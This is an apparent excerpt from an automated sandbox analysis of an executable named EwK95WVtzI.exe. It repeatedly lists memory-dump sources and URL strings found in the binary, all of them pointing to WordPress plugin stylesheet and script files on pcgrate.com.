                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/webpack-pro.runtime.min.js?ver=3.3.
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/lib/sticky/jquery.sticky.min.js?ver=3.
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/css/bg-show-hide.css?ver=5
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/css/genericons/genericons.
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/show-hidecollapse-expand/assets/js/bg-show-hide.js?ver=5.8
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Css/customize-table.css?ver=2
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.7
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/css/gpls_woo_rfq.css?v
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?ver
